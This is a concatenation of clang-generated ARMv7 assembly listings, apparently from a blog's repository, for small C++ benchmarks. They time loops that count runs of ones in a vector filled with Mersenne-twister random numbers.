vldr d16, .LCPI0_0
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp5:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_
mov r5, r0
.Ltmp6:
@ BB#9: @ %_ZNSolsEd.exit
.Ltmp7:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp8:
@ BB#10: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit2
ldr r1, [sp, #20]
.Ltmp9:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_
.Ltmp10:
@ BB#11: @ %_ZNSolsEj.exit
.Ltmp11:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp12:
@ BB#12: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB0_14
@ BB#13:
mov r0, r4
bl _ZdlPv
.LBB0_14: @ %_ZNSt6vectorIiSaIiEED2Ev.exit
mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
.LBB0_15:
.Ltmp13:
mov r5, r0
cmp r4, #0
beq .LBB0_18
@ BB#16:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB0_17:
.Ltmp2:
mov r5, r0
.LBB0_18: @ %_ZNSt6vectorIiSaIiEED2Ev.exit4
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#19:
.LCPI0_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp14:
.size main, .Ltmp14-main
.Leh_func_end0:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
.handlerdata
.align 2
GCC_except_table0:
.Lexception0:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp0-.Leh_func_begin0 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp1-.Ltmp0 @ Call between .Ltmp0 and .Ltmp1
.long .Lset1
.Lset2 = .Ltmp2-.Leh_func_begin0 @ jumps to .Ltmp2
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp1-.Leh_func_begin0 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp3-.Ltmp1 @ Call between .Ltmp1 and .Ltmp3
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp3-.Leh_func_begin0 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp4-.Ltmp3 @ Call between .Ltmp3 and .Ltmp4
.long .Lset6
.Lset7 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp4-.Leh_func_begin0 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp5-.Leh_func_begin0 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp12-.Ltmp5 @ Call between .Ltmp5 and .Ltmp12
.long .Lset11
.Lset12 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset12
.byte 0 @ On action: cleanup
.Lset13 = .Ltmp12-.Leh_func_begin0 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end0-.Ltmp12 @ Call between .Ltmp12 and .Leh_func_end0
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin1:
@ BB#0:
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1}
sub r0, r1, r0
cmn r0, #1
beq .LBB1_6
@ BB#1:
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv
mov r8, r0
ldr r1, [r5, #2496]
mul r7, r8, r7
movw r6, #22144
movw r4, #0
movt r6, #40236
movt r4, #61382
.LBB1_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB1_4
@ BB#3: @ in Loop: Header=BB1_2 Depth=1
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB1_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB1_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496]
ldr r0, [r5, r1, lsl #2]
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB1_2
@ BB#5:
mov r1, r8
bl __aeabi_uidiv
b .LBB1_9
.LBB1_6:
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB1_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB1_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB1_9:
ldr r1, [r9]
add r0, r1, r0
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp15:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp15-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin2:
@ BB#0:
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0]
movw r12, #45279
mov r2, #0
movt r12, #39176
.LBB2_1: @ =>This Inner Loop Header: Depth=1
add r1, r0, r2
ldr r3, [r1, #4]
ldr r5, [r1, #1588]
and r1, lr, #-2147483648
bic r4, r3, #-2147483647
tst r3, #1
orr r1, r4, r1
mov lr, r3
eor r1, r5, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908
bne .LBB2_1
@ BB#2: @ %.preheader
ldr r4, [r0, #908]
mov r2, #0
.LBB2_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]!
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396
bne .LBB2_3
@ BB#4:
ldr r1, [r0, #2492]
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496]
pop {r4, r5, r11, pc}
.Ltmp16:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp16-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
.type _GLOBAL__sub_I_minus_mul_plus.cpp,%function
_GLOBAL__sub_I_minus_mul_plus.cpp: @ @_GLOBAL__sub_I_minus_mul_plus.cpp
.fnstart
.Leh_func_begin3:
@ BB#0:
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev
movw r2, :lower16:__dso_handle
movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4
pop {r4, r10, r11, lr}
b __cxa_atexit
.Ltmp17:
.size _GLOBAL__sub_I_minus_mul_plus.cpp, .Ltmp17-_GLOBAL__sub_I_minus_mul_plus.cpp
.Leh_func_end3:
.fnend
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 1111s: "
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_minus_mul_plus.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 14,685
|
exp/cpp_and_and/ARMv7/s/andand.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "andand.cpp"
.globl main
.align 3
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin0:
@ BB#0:
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655
str r0, [sp, #32]
.LBB0_1: @ =>This Inner Loop Header: Depth=1
eor r0, r0, r0, lsr #30
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB0_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528]
mov r0, #1
str r5, [sp, #24]
str r0, [sp, #28]
.Ltmp0:
movw r8, #36864
movt r8, #976
mov r0, r8
bl _Znwj
mov r4, r0
.Ltmp1:
@ BB#3: @ %.lr.ph
mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset
add r6, sp, #32
add r7, sp, #24
.LBB0_4: @ =>This Inner Loop Header: Depth=1
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
str r0, [r4, r5]
add r5, r5, #4
cmp r5, r8
bne .LBB0_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20]
bl _ZNSt6chrono3_V212system_clock3nowEv
movw r0, #36852
movt r0, #976
.LBB0_6: @ =>This Inner Loop Header: Depth=1
ldr r1, [r4, r5]
cmp r1, #1
bne .LBB0_9
@ BB#7: @ in Loop: Header=BB0_6 Depth=1
add r1, r4, r5
ldr r2, [r1, #4]
cmp r2, #1
ldreq r2, [r1, #8]
cmpeq r2, #1
bne .LBB0_9
@ BB#8: @ in Loop: Header=BB0_6 Depth=1
ldr r1, [r1, #12]
cmp r1, #1
ldreq r1, [sp, #20]
addeq r1, r1, #1
streq r1, [sp, #20]
.LBB0_9: @ %._crit_edge7
@ in Loop: Header=BB0_6 Depth=1
add r5, r5, #4
cmp r5, r0
bne .LBB0_6
@ BB#10:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv
.Ltmp3:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp4:
@ BB#11:
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0
sbc r1, r3, r1
bl __aeabi_l2d
vldr d16, .LCPI0_0
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp5:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_
mov r5, r0
.Ltmp6:
@ BB#12: @ %_ZNSolsEd.exit
.Ltmp7:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp8:
@ BB#13: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit2
ldr r1, [sp, #20]
.Ltmp9:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_
.Ltmp10:
@ BB#14: @ %_ZNSolsEj.exit
.Ltmp11:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp12:
@ BB#15: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB0_17
@ BB#16:
mov r0, r4
bl _ZdlPv
.LBB0_17: @ %_ZNSt6vectorIiSaIiEED2Ev.exit
mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
.LBB0_18:
.Ltmp13:
mov r5, r0
cmp r4, #0
beq .LBB0_21
@ BB#19:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB0_20:
.Ltmp2:
mov r5, r0
.LBB0_21: @ %_ZNSt6vectorIiSaIiEED2Ev.exit4
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#22:
.LCPI0_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp14:
.size main, .Ltmp14-main
.Leh_func_end0:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
.handlerdata
.align 2
GCC_except_table0:
.Lexception0:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp0-.Leh_func_begin0 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp1-.Ltmp0 @ Call between .Ltmp0 and .Ltmp1
.long .Lset1
.Lset2 = .Ltmp2-.Leh_func_begin0 @ jumps to .Ltmp2
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp1-.Leh_func_begin0 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp3-.Ltmp1 @ Call between .Ltmp1 and .Ltmp3
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp3-.Leh_func_begin0 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp4-.Ltmp3 @ Call between .Ltmp3 and .Ltmp4
.long .Lset6
.Lset7 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp4-.Leh_func_begin0 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp5-.Leh_func_begin0 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp12-.Ltmp5 @ Call between .Ltmp5 and .Ltmp12
.long .Lset11
.Lset12 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset12
.byte 0 @ On action: cleanup
.Lset13 = .Ltmp12-.Leh_func_begin0 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end0-.Ltmp12 @ Call between .Ltmp12 and .Leh_func_end0
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin1:
@ BB#0:
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1}
sub r0, r1, r0
cmn r0, #1
beq .LBB1_6
@ BB#1:
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv
mov r8, r0
ldr r1, [r5, #2496]
mul r7, r8, r7
movw r6, #22144
movw r4, #0
movt r6, #40236
movt r4, #61382
.LBB1_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB1_4
@ BB#3: @ in Loop: Header=BB1_2 Depth=1
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB1_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB1_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496]
ldr r0, [r5, r1, lsl #2]
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB1_2
@ BB#5:
mov r1, r8
bl __aeabi_uidiv
b .LBB1_9
.LBB1_6:
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB1_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB1_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB1_9:
ldr r1, [r9]
add r0, r1, r0
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp15:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp15-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin2:
@ BB#0:
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0]
movw r12, #45279
mov r2, #0
movt r12, #39176
.LBB2_1: @ =>This Inner Loop Header: Depth=1
add r1, r0, r2
ldr r3, [r1, #4]
ldr r5, [r1, #1588]
and r1, lr, #-2147483648
bic r4, r3, #-2147483647
tst r3, #1
orr r1, r4, r1
mov lr, r3
eor r1, r5, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908
bne .LBB2_1
@ BB#2: @ %.preheader
ldr r4, [r0, #908]
mov r2, #0
.LBB2_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]!
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396
bne .LBB2_3
@ BB#4:
ldr r1, [r0, #2492]
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496]
pop {r4, r5, r11, pc}
.Ltmp16:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp16-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
.type _GLOBAL__sub_I_andand.cpp,%function
_GLOBAL__sub_I_andand.cpp: @ @_GLOBAL__sub_I_andand.cpp
.fnstart
.Leh_func_begin3:
@ BB#0:
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev
movw r2, :lower16:__dso_handle
